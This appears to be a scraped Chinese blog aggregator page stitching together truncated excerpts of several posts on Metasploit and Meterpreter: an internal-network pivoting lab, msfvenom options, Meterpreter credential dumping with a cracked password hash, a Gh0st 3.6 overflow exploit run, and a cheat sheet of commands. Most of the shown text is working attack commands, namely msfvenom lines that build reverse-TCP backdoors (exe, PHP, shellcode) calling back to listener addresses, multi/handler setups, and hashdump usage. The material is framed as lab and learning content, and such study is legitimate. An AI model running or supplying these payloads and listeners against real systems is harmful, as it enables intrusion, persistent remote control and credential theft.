meterpreter

msfconsole

こ雲淡風輕ζ 提交于 2020-02-03 06:57:15
先模拟多层内网,摸清后渗透的使用,再从学校入手。 内网渗透test 网络拓扑 以kali为攻击机,xp作为跳板主机,win7是内网主机 xp主机是提供web,FTP等服务,已被kali机获取shell win7正常不与外网访问,和DMZ区域处于同一网段 环境搭建 使用VMware的主机模式,构建虚拟局域网。 查看 Host-only模式详解 虚拟网络编译器中添加两块网卡vm1,vm2。 类型 :主机模式 设置xp为双网卡vm1,vm2。其余按网络拓扑分配网卡 查看ip kali xp win7 至此环境布置完毕 拿下跳板以及端口转发 以社工等方法获取到xp主机的shell 通过metasploit会话,使用Windows xp靶机作为跳板,扫描和攻击内部网络主机 #kali msf msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set lhost 192.168.252.128 lhost => 192.168.252.128 msf5 exploit(multi

【tool】远控免杀专题文章-msfvenom隐藏的参数

末鹿安然 提交于 2020-01-24 22:04:49
本节目录如下: msfvenom简介 msfvenom是msfpayload和msfencode的结合体,于2015年6月8日取代了msfpayload和msfencode。在此之后,metasploit-framework下面的的msfpayload(荷载生成器),msfencoder(编码器),msfcli(监听接口)都不再被支持。 常规参数 msfvenom所有参数 部分参数解读 -p, –payload < payload> 指定需要使用的payload(攻击荷载)。也可以使用自定义payload,几乎是支持全平台的 -l, –list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all -n, –nopsled < length> 为payload预先指定一个NOP滑动长度 -f, –format < format> 指定输出格式 (使用 –help-formats 来获取msf支持的输出格式列表) -e, –encoder [encoder] 指定需要使用的encoder(编码器),指定需要使用的编码,如果既没用-e选项也没用-b选项,则输出raw payload -a, –arch < architecture> 指定payload的目标架构,例如x86 | x64 | x86_64

meterpreter 渗透用法

风格不统一 提交于 2020-01-16 01:17:12
获取凭证 hashdump模块(post)可以从 SAM 数据库中导出本地用户账号,credential_collector脚本(post/windows/gather/credentials)也可以从目标设备中收集令牌信息。 脚本和post模块都需要通过“run”命令执行,我在测试环境中运行hashdump模块后的结果如下: 数据的输出格式为:用户名:SID:LM哈希:NTLM哈希:::,所以我们得到了三个用户账号,分别为Administrator, Guest和Coen。 其中的 LM 哈希(aad3b435b51404eeaad3b435b51404ee)跟 NTLM 哈希(31d6cfe0d16ae931b73c59d7e0c089c0)对应的是一个空密码。 接下来要处理的就是用户Coen的密码(f773c5db7ddebefa4b0dae7ee8c50aea)了。虽然我们可以使用类似 John the Ripper 这样的工具来破解密码,但是我们直接 Google 这个哈希之后,就直接得到了 密码明文 : trustno1 。 运行程序 我们还可以使用“execute”命令在目标系统中执行应用程序。这个命令的使用方法如下: execute -f<file> [Options] 运行后它将执行file参数所指定的文件。可选参数如下: -H:创建一个隐藏进程 -a

利用Gh0st 3.6远程溢出漏洞反向控制攻击者

廉价感情. 提交于 2020-01-12 22:06:43
title: 利用Gh0st 3.6远程溢出漏洞反向控制攻击者 comments: true toc: true categories: [Metasploit] [Exp] tags: Metasploit Overflow Gh0st date: 2020-01-12 18:30:10 abbrlink: 30568 前言 漏洞验证在2017年被公开,实际上Gh0st溢出漏洞在2009年时就已被人爆出过多个 可见使用开源C2工具,不见得安全,最好是经过二次修改,单纯做免杀可防不了哦 MSF Teston WinXP at 2017-09-15 运行Gh0st客户端,然后通过MSF溢出C2客户端机器,即可反向获取攻击者机器权限 msf > use exploit/windows/misc/gh0st msf exploit(gh0st) > set RHOST 192.168.1.126 RHOST => 192.168.1.126 msf exploit(gh0st) > run [*] Started reverse TCP handler on 192.168.1.125:4444 [*] 192.168.1.126:80 - Trying target Gh0st Beta 3.6 [*] 192.168.1.126:80 - Spraying heap... [*]

Msf的一些常用操作

南笙酒味 提交于 2020-01-10 05:00:49
payload的几个常用生成 生成windows下的反弹木马 msfvenom -p windows/meterpreter/reverse_tcp LHOST=60.205.212.140 LPORT=8888 -f exe > 8888.exe // -p < payload > -f < format> -o < path> = > 监听 use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 172.17.150.246 //阿里云云服务器这里是内网ip set LPORT 8888 exploit -j PHP: msfvenom -p php/meterpreter_reverse_tcp LHOST=60.205.212.140 LPORT=8888 -f raw > shell.php use exploit/multi/handler set PAYLOAD php/meterpreter_reverse_tcp set LHOST 172.17.150.246 set LPORT 8888 exploit -j shellcode: msfvenom -p windows/meterpreter/reverse_tcp LPORT=1234 LHOST=60

Kali学习 | 漏洞利用:4.4 控制Meterpreter

人盡茶涼 提交于 2020-01-10 02:29:11
Kali学习 | 漏洞利用:4.4 控制Meterpreter 介绍 操作步骤 介绍 Meterpreter是Metasploit框架中的一个 杀手铜 ,通常 作为利用漏洞后的攻击载荷 所使用,攻击载荷在触发漏洞后能够返回给用户一个控制通道。 当使用 Armitage、MSFCLI 或 MSFCONSOLE 获取到目标系统上的一个Meterpreter连接时,用户必须使用Meterpreter传递攻击载荷。 MSFCONSOLE用于管理用户的会话,而Meterpreter则是攻击载荷和渗透攻击交互 。 Meterpreter包括的一些 常见命令 如下所示。 help :查看帮助信息。 background :允许用户在后台Meterpreter会话N- download :允许用户从入侵主机上下载文件。 upload :允许用户上传文件到入侵主机。 execute :允许用户在入侵主机上执行命令。 shell :允许用户在入侵主机上(仅是Windows主机)运行Windows shell命令。 session -i :允许用户切换会话。 操作步骤 (1)在MSFCONSOLE上启动一个活跃的会话。 (2)通过利用系统的用户启动登录键盘输入。执行命令如下所示: meterpreter > keyscan start Starting the keystroke sniffer ..

简单的内网渗透实验

孤街浪徒 提交于 2020-01-09 23:53:17
本机win10  192.168.1.109 虚拟机win7  NAT模式  192.168.1.131 攻击机:虚拟机kali  仅主机模式  192.168.10.128 假设攻击机kali已经对win10主机getshell 1.kali生成一个exe木马文件test.exe(这是最简单的木马文件,有杀软就会被杀,若要免杀还要做免杀处理) msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.10.128 lport=4444 -f exe -o test.exe 将test.exe上传到win10主机上 2.msf下使用反弹连接 msfconsole msf5 > use exploit/multi/handler 3.设置反弹需要的payload msf5 > set payload windows/x64/meterpreter/reverse_tcp 4.查看配置选项 msf5 > show options 5.设置反弹回来的我们自己的主机IP和端口,开始监听4444端口 msf5 > set lhost 192.168.10.128 msf5 > set lport 4444 msf5 > run 6.目标主机打开木马程序文件payload.exe,得到反弹shell meterpreter >

Exp3 免杀原理与实践

烈酒焚心 提交于 2020-01-09 07:10:39
1实验要求 1.1 正确使用msf编码器(0.5分),msfvenom生成如jar之类的其他文件(0.5分),veil-evasion(0.5分),加壳工具(0.5分),使用shellcode编程(1分) 1.2 通过组合应用各种技术实现恶意代码免杀(0.5分) (如果成功实现了免杀的,简单语言描述原理,不要截图。与杀软共生的结果验证要截图。 1.3 用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本(加分0.5) 2实验步骤 检测工具: https://www.virustotal.com/ http://www.virscan.org/ 首先使用VirusTotal或Virscan这两个网站对上次实验生成的后门程序进行扫描。 virustotal virscan 2.1任务一 2.1.1正确使用msf编码器,生成exe文件 使用msf编码器对后门程序进行一次到多次的编码,并进行检测。 一次编码命令: mfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.183.130 LPORT=4308 -f exe > met-encoded.exe 利用之前实验所学,将生成的met-encoded

Metasploit用法大全

六眼飞鱼酱① 提交于 2019-12-29 07:43:40
Metasploit用户接口 msfconsole Armitage: KaliGUI启动;armitage命令启动 Metasploit功能程序 msfvenom 集成了载荷生成器、载荷编码器、空指令生成器的功能 查看详细指令选项:msfvenom-h 服务器消息块协议扫描 msf>useauxiliary/scanner/smb/smb_version 搜寻配置不当的MicrosoftSQLServer msf>useauxiliary/scanner/mssql/mssql_ping SSH服务器扫描 msf>useauxiliary/scanner/ssh/ssh_version FTP扫描 msf>useauxiliary/scanner/ftp/ftp_version,发现ftp服务器 msf>useauxiliary/scanner/ftp/anonymous,检查是否允许匿名登录 简单网管协议扫描 msf>useauxiliary/scanner/snmp/snmp_login 渗透攻击基础 msf>showexploits msf>showauxiliary msf>showoptions msf>showpayloads msf>showtargets info set和unset setg和unsetg save 你的第一次渗透攻击 操作机:KaliLinux

第十八章——内网渗透之域渗透

柔情痞子 提交于 2019-12-24 12:00:36
渗透学习交流群:773617250进群可免费领取学习工具,群内定期通知直播时间!欢迎大家进群学习交流!感谢大家的支持! MSF 在讲域渗透之前,先给大家讲讲MSF ●kali代理配置 http://pawelli.com/archives/527 ●回顾msf知识 ●针对内网 批量扫描 ms17-010 ●针对域成员 08R2 msf渗透 并提权 要点:针对对方是x64的架构 生成一个x64的反弹shell的exe文件 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.145 LPORT=6666 -f exe -o shell.exe 可以利用这个模块配合提权multi/recon/local_exploit_suggester 关于msfvenom生成木马: 参数: -p 指定要使用的 msf 的 payload,也可以使用自定义 payload。 -l 列出所有可用的所有可用资源. 模块类型包括: payloads, encoders, nops等。 -n 为 payload 预先指定一个 NOP 滑动长度(一切为了绕过防火墙与免杀)。 -f 指定 payload 输出的文件类型,–help-formats,可查看支持的所有输出格式(默认的输出格式是 raw,直接输出 payload 的字符